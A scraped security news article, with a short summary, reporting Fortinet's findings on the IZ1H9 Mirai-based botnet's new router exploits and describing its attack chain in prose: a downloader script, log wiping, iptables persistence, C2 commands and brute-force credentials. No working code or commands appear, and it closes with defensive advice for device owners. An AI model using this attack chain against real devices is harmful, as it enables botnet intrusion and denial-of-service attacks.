Article Details
Scrape Timestamp (UTC): 2023-10-10 20:39:58.625
Original Article Text
Click to Toggle View
Mirai DDoS malware variant expands targets with 13 router exploits. A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others. Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices. IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower. Extensive IoT targeting The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful botnet capable of delivering massive blows against websites. In the case of IZ1H9, Fortinet reports it uses exploits for the following flaws, dating from 2015 to 2023: The campaign also targets an unspecified CVE related to the “/cgi-bin/login.cgi” route, potentially affecting the Prolink PRC2402M router. Attack chain After exploiting one of the aforementioned CVEs, an IZ1H9 payload is injected into the device containing a command to fetch a shell script downloader named “l.sh” from a specified URL. Upon execution, the script deletes logs to hide the malicious activity, and next, it fetches bot clients tailored for different system architectures. Finally, the script modifies the device’s iptables rules to obstruct connection on specific ports and make it harder to remove the malware from the device. Having done all the above, the bot establishes communication with the C2 (command and control) server and waits for commands to execute. The supported commands concern the type of DDoS attack to launch, including UDP, UDP Plain, HTTP Flood, and TCP SYN. Fortinet also reports that IZ1H9 features a data section with hardcoded credentials used for brute-force attacks. These attacks might be helpful for propagation to adjacent devices or authenticating to IoTs for which it does not have a working exploit. Owners of IoT devices are recommended to use strong admin user credentials, update them to the latest available firmware version, and, if possible, reduce their exposure to the public internet.
Daily Brief Summary
A variant of the Mirai-based DDoS (distributed denial of service) malware botnet known as IZ1H9 has added 13 new payloads to increase its target range. It primarily targets Linux-based routers and certain router models from companies like D-Link, Zyxel, TP-Link, and TOTOLINK.
IZ1H9 compromises devices, assimilates them into its DDoS swarm, and then uses these devices to launch DDoS attacks on specified targets. IoT (Internet of Things) devices are believed to be a significant target group for this botnet.
Peak exploitation rates for IZ1H9 were recorded in early September, with tens of thousands of attempts on vulnerable devices.
Upon breaching a device, it injects an IZ1H9 payload which later fetches a shell script downloader called "l.sh." This allows the attacker to modify device configurations and create obstructions to aid in malware retention within the device.
IZ1H9 also reportedly has a data section with hardcoded credentials that it uses for brute-force attacks. This enhances its capacity for propagation to adjacent devices or access to IoT devices for which it lacks a working exploit.
To minimize the risk of becoming victim to such an attack, IoT device owners are advised to use strong admin user credentials, regularly update their firmware, and limit the devices' exposure to the public internet.